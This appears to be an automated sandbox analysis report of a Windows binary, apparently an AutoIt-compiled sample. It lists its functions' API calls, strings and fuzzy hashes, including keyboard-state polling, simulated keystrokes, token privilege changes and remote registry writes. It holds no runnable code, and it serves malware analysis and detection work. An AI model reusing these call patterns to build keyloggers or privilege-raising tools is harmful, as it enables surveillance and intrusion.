                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 4c8365c541e7b0491706245211d2ccf970f10eb3092f4c5ad012340c400beb8f
                                                                    • Instruction ID: 3f31dfa92b313044c9bb084c1094fc3ada01e7a2220f9a7a3787fd119fcb93b7
                                                                    • Opcode Fuzzy Hash: 4c8365c541e7b0491706245211d2ccf970f10eb3092f4c5ad012340c400beb8f
                                                                    • Instruction Fuzzy Hash: C3D0C77464030CBFE710DB80DC46FAA777CD705710F100194FD0497290D6B27D508795
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 01581A33
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                    • Instruction ID: 1a7ac1cf101752545dc89cc27e19db3e7ebbb92d6182908843f4acf929106f28
                                                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                    • Instruction Fuzzy Hash: A4D05E3090520CABCB10DAA8D90499DB3E8AB05320F004754E91597281D5719A409790
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __wfsopen
                                                                    • String ID:
                                                                    • API String ID: 197181222-0
                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                    • Instruction ID: f90413dfbd64c80c5f5f0d197ff2bd5c3e8347fb515e7ee6ccc792dff290d58a
                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                    • Instruction Fuzzy Hash: 01B0927644020C77CE012A82FC02A593F199B42B64F408020FB0C18172E677A664AA89
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 0103D1FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1452528299-0
                                                                    • Opcode ID: 7a7a6939303112474378c1232a81ab8490e35a452c9f19180309bca8f3f979b9
                                                                    • Instruction ID: 5f69354724e86f4b4cfd3888c702bb8baf72e69429fb17242c44ed5d01005658
                                                                    • Opcode Fuzzy Hash: 7a7a6939303112474378c1232a81ab8490e35a452c9f19180309bca8f3f979b9
                                                                    • Instruction Fuzzy Hash: 207195306083018FD704EF68C891A6EB7E5BF95710F48496DF9968B3A2DB34E909DB52
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 01583469
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction ID: 2c302bdbe7f6064eb214d6b2693a4d3a902d12f9f9aaa895a613a09f0026d8ed
                                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                    • Instruction Fuzzy Hash: 4EE09A7494010DAFDB00EFA8D54969D7BB4FF04701F1046A5FD05A6691DA309A548A62
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 01583469
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: 84c7a7de3d671a5d79eba06f2a17c6df9e57dee21d8e2ed76ff48e4971fc051d
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: 97E0E67494010DDFDB00EFB8D54D69D7BB4FF04701F104265FD01E2381D6309D508A62
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0105CB37
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0105CB95
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0105CBD6
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0105CC00
                                                                    • SendMessageW.USER32 ref: 0105CC29
                                                                    • _wcsncpy.LIBCMT ref: 0105CC95
                                                                    • GetKeyState.USER32(00000011), ref: 0105CCB6
                                                                    • GetKeyState.USER32(00000009), ref: 0105CCC3
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0105CCD9
                                                                    • GetKeyState.USER32(00000010), ref: 0105CCE3
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0105CD0C
                                                                    • SendMessageW.USER32 ref: 0105CD33
                                                                    • SendMessageW.USER32(?,00001030,?,0105B348), ref: 0105CE37
                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0105CE4D
                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0105CE60
                                                                    • SetCapture.USER32(?), ref: 0105CE69
                                                                    • ClientToScreen.USER32(?,?), ref: 0105CECE
                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0105CEDB
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0105CEF5
                                                                    • ReleaseCapture.USER32 ref: 0105CF00
                                                                    • GetCursorPos.USER32(?), ref: 0105CF3A
                                                                    • ScreenToClient.USER32(?,?), ref: 0105CF47
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0105CFA3
                                                                    • SendMessageW.USER32 ref: 0105CFD1
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0105D00E
                                                                    • SendMessageW.USER32 ref: 0105D03D
                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0105D05E
                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0105D06D
                                                                    • GetCursorPos.USER32(?), ref: 0105D08D
                                                                    • ScreenToClient.USER32(?,?), ref: 0105D09A
                                                                    • GetParent.USER32(?), ref: 0105D0BA
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0105D123
                                                                    • SendMessageW.USER32 ref: 0105D154
                                                                    • ClientToScreen.USER32(?,?), ref: 0105D1B2
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0105D1E2
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0105D20C
                                                                    • SendMessageW.USER32 ref: 0105D22F
                                                                    • ClientToScreen.USER32(?,?), ref: 0105D281
                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0105D2B5
                                                                      • Part of subcall function 00FD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FD25EC
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0105D351
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                    • String ID: @GUI_DRAGID$F
                                                                    • API String ID: 3977979337-4164748364
                                                                    • Opcode ID: e33a48190e689529ab204eded5e336fde4eb93f1830cb674ef91f2c1fa5499a7
                                                                    • Instruction ID: df56c47a1e80ad3d60ec41fc8919b6f65fefda8e14a3bd7ae1ee5a31adca51be
                                                                    • Opcode Fuzzy Hash: e33a48190e689529ab204eded5e336fde4eb93f1830cb674ef91f2c1fa5499a7
                                                                    • Instruction Fuzzy Hash: B742BF38104341AFEBA1CF29C944AABBFE9FF48350F04055AFAD5972A5C736D840EB91
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$_memset
                                                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                    • API String ID: 1357608183-1798697756
                                                                    • Opcode ID: 5e3d9d375217f3e9d70c9dd70b02bd1afc846ad0307246a63876d011590cff52
                                                                    • Instruction ID: 746fe1334fde343f2225aebdba3e38ab5c93cacc9a851195b5c8f259b06cdd65
                                                                    • Opcode Fuzzy Hash: 5e3d9d375217f3e9d70c9dd70b02bd1afc846ad0307246a63876d011590cff52
                                                                    • Instruction Fuzzy Hash: FF93A575E04325DBDB24DF98C881BADB7F1FF48310F2581AAE985EB281E7749981DB40
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00FD48DF
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0100D665
                                                                    • IsIconic.USER32(?), ref: 0100D66E
                                                                    • ShowWindow.USER32(?,00000009), ref: 0100D67B
                                                                    • SetForegroundWindow.USER32(?), ref: 0100D685
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0100D69B
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0100D6A2
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0100D6AE
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0100D6BF
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0100D6C7
                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0100D6CF
                                                                    • SetForegroundWindow.USER32(?), ref: 0100D6D2
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D6E7
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0100D6F2
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D6FC
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0100D701
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D70A
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0100D70F
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0100D719
                                                                    • keybd_event.USER32(00000012,00000000), ref: 0100D71E
                                                                    • SetForegroundWindow.USER32(?), ref: 0100D721
                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 0100D748
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    • Opcode ID: c348a2336ba2ec4383f50df3f63ac27eee3d8800d5a63a7c02fbe9e91e08f585
                                                                    • Instruction ID: 809ecc09d548e7720cdef27339236a66b7e6e3e3f425693372274697a57d592a
                                                                    • Opcode Fuzzy Hash: c348a2336ba2ec4383f50df3f63ac27eee3d8800d5a63a7c02fbe9e91e08f585
                                                                    • Instruction Fuzzy Hash: 3E318071A40318BBFB312BA19C49F7F3E6CEB48B50F104055FB44EA1C1D6B95900ABB0
                                                                    APIs
                                                                      • Part of subcall function 010287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0102882B
                                                                      • Part of subcall function 010287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01028858
                                                                      • Part of subcall function 010287E1: GetLastError.KERNEL32 ref: 01028865
                                                                    • _memset.LIBCMT ref: 01028353
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 010283A5
                                                                    • CloseHandle.KERNEL32(?), ref: 010283B6
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 010283CD
                                                                    • GetProcessWindowStation.USER32 ref: 010283E6
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 010283F0
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0102840A
                                                                      • Part of subcall function 010281CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01028309), ref: 010281E0
                                                                      • Part of subcall function 010281CB: CloseHandle.KERNEL32(?,?,01028309), ref: 010281F2
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 2063423040-1027155976
                                                                    • Opcode ID: dcd6d40d7ad33c1f145e57e246b27e8165b4bb0f1a72960c22387916877c21f3
                                                                    • Instruction ID: a228f5214919f59d2d427a592ed0ef1d29533f1a04f5b9865d72db049e6cfde0
                                                                    • Opcode Fuzzy Hash: dcd6d40d7ad33c1f145e57e246b27e8165b4bb0f1a72960c22387916877c21f3
                                                                    • Instruction Fuzzy Hash: 9A81707590022DAFEF51DFA4CC44AEE7BF8FF08304F14819AFA90A6164D7398A54DB20
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0103C78D
                                                                    • FindClose.KERNEL32(00000000), ref: 0103C7E1
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0103C806
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0103C81D
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0103C844
                                                                    • __swprintf.LIBCMT ref: 0103C890
                                                                    • __swprintf.LIBCMT ref: 0103C8D3
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    • __swprintf.LIBCMT ref: 0103C927
                                                                      • Part of subcall function 00FF3698: __woutput_l.LIBCMT ref: 00FF36F1
                                                                    • __swprintf.LIBCMT ref: 0103C975
                                                                      • Part of subcall function 00FF3698: __flsbuf.LIBCMT ref: 00FF3713
                                                                      • Part of subcall function 00FF3698: __flsbuf.LIBCMT ref: 00FF372B
                                                                    • __swprintf.LIBCMT ref: 0103C9C4
                                                                    • __swprintf.LIBCMT ref: 0103CA13
                                                                    • __swprintf.LIBCMT ref: 0103CA62
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 3953360268-2428617273
                                                                    • Opcode ID: 712613429bfbe70be35d69b7981450b3cdd309d5230c2aabfa6cbbbadb302baf
                                                                    • Instruction ID: 6685b1453d26079be1cf1e76a8bc59e5b6e6106ff4b2709e8de617891672e95d
                                                                    • Opcode Fuzzy Hash: 712613429bfbe70be35d69b7981450b3cdd309d5230c2aabfa6cbbbadb302baf
                                                                    • Instruction Fuzzy Hash: 7BA14BB2408345ABD710EFA4CC85DAFB7EDFF84704F44091AF585C6291EA79DA08DB62
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0103EFB6
                                                                    • _wcscmp.LIBCMT ref: 0103EFCB
                                                                    • _wcscmp.LIBCMT ref: 0103EFE2
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0103EFF4
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0103F00E
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0103F026
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F031
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0103F04D
                                                                    • _wcscmp.LIBCMT ref: 0103F074
                                                                    • _wcscmp.LIBCMT ref: 0103F08B
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0103F09D
                                                                    • SetCurrentDirectoryW.KERNEL32(01088920), ref: 0103F0BB
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0103F0C5
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F0D2
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F0E4
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1803514871-438819550
                                                                    • Opcode ID: cecfbca9a07084417c6aa01e47b48410ebe4af8b11a6fdb5be746ae19ea142f1
                                                                    • Instruction ID: b9a554848958964e2a90d099c73aedb90b71b57be661ddb4e8290dcfd004e3c8
                                                                    • Opcode Fuzzy Hash: cecfbca9a07084417c6aa01e47b48410ebe4af8b11a6fdb5be746ae19ea142f1
                                                                    • Instruction Fuzzy Hash: FE31D87290121B7AEB24EBB8DC48AEFB7EC9F84260F044196F9D4D3050DB79DA44CB52
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01050953
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0105F910,00000000,?,00000000,?,?), ref: 010509C1
                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01050A09
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01050A92
                                                                    • RegCloseKey.ADVAPI32(?), ref: 01050DB2
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 01050DBF
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 536824911-966354055
                                                                    • Opcode ID: 353dee929fd7a93ce4c3f048ed76a411baac450fa5391f55b696ef5a73b1d00d
                                                                    • Instruction ID: 1059f88e0a019746a0a74abb7b6b3da3efce9cfcf03c86a07f40669c3c81321c
                                                                    • Opcode Fuzzy Hash: 353dee929fd7a93ce4c3f048ed76a411baac450fa5391f55b696ef5a73b1d00d
                                                                    • Instruction Fuzzy Hash: C70246756046019FDB94EF18C850E2EBBE5EF89710F08885DF9899B362CB74ED01DB81
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0103F113
                                                                    • _wcscmp.LIBCMT ref: 0103F128
                                                                    • _wcscmp.LIBCMT ref: 0103F13F
                                                                      • Part of subcall function 01034385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 010343A0
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0103F16E
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F179
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0103F195
                                                                    • _wcscmp.LIBCMT ref: 0103F1BC
                                                                    • _wcscmp.LIBCMT ref: 0103F1D3
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0103F1E5
                                                                    • SetCurrentDirectoryW.KERNEL32(01088920), ref: 0103F203
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0103F20D
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F21A
                                                                    • FindClose.KERNEL32(00000000), ref: 0103F22C
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 1824444939-438819550
                                                                    • Opcode ID: 730e537bdb521a18b8fd156fe55ebc239c1fc289c2f8f3a5e161a05f11c231e2
                                                                    • Instruction ID: 8525f59a75480d610ec44711d7f4ffa1cf9c83506ddce1de93d7e8dca46e5abf
                                                                    • Opcode Fuzzy Hash: 730e537bdb521a18b8fd156fe55ebc239c1fc289c2f8f3a5e161a05f11c231e2
                                                                    • Instruction Fuzzy Hash: 50311A7690021FBAEB60AE64EC48EEF77AC9F85260F144196E9C0E3090DB35DA45CB55
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0103A20F
                                                                    • __swprintf.LIBCMT ref: 0103A231
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0103A26E
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0103A293
                                                                    • _memset.LIBCMT ref: 0103A2B2
                                                                    • _wcsncpy.LIBCMT ref: 0103A2EE
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0103A323
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0103A32E
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0103A337
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0103A341
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 2733774712-3457252023
                                                                    • Opcode ID: 59b44c3ecd8cc27e27d94d6a30a3400ef0fb58c70b55d4e50f28165006794f0d
                                                                    • Instruction ID: 46a7ec73e7027997c50401b77b3bc51051643f8f578f746c71b34bbf155d119e
                                                                    • Opcode Fuzzy Hash: 59b44c3ecd8cc27e27d94d6a30a3400ef0fb58c70b55d4e50f28165006794f0d
                                                                    • Instruction Fuzzy Hash: 7331D4B560020AABDB21DFA4DC49FEB37BCEF89740F1041A6F688D6161E77992448B24
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                    • API String ID: 0-4052911093
                                                                    • Opcode ID: eba1c0a0280730b9e632dc3f62ad0107ba65989c2579118c4b54b7a558c64df2
                                                                    • Instruction ID: 845f90edcd985379fc0a4a8b6e2e7040ae9ebd45c39a6175577be34bfd23e2b7
                                                                    • Opcode Fuzzy Hash: eba1c0a0280730b9e632dc3f62ad0107ba65989c2579118c4b54b7a558c64df2
                                                                    • Instruction Fuzzy Hash: D572A271E00269DBDF24DF59C8807AEB7F5FF58350F1481AAE849EB281DB349A41DB90
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 01030097
                                                                    • SetKeyboardState.USER32(?), ref: 01030102
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 01030122
                                                                    • GetKeyState.USER32(000000A0), ref: 01030139
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 01030168
                                                                    • GetKeyState.USER32(000000A1), ref: 01030179
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 010301A5
                                                                    • GetKeyState.USER32(00000011), ref: 010301B3
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 010301DC
                                                                    • GetKeyState.USER32(00000012), ref: 010301EA
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 01030213
                                                                    • GetKeyState.USER32(0000005B), ref: 01030221
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: eea990666be577d71be7b1ef8774c52604323a161d981fdc7cc67a5ebf2be509
                                                                    • Instruction ID: c92e60f04e2c216c7b455325b69919e95fe1add45378d0e6740a42a88b6c7e44
                                                                    • Opcode Fuzzy Hash: eea990666be577d71be7b1ef8774c52604323a161d981fdc7cc67a5ebf2be509
                                                                    • Instruction Fuzzy Hash: 6A51FB3090678929FB75DBA888147EAFFFC9F41280F0845C9EAC2575C7DAA4978CC761
                                                                    APIs
                                                                      • Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010504AC
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0105054B
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010505E3
                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01050822
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0105082F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
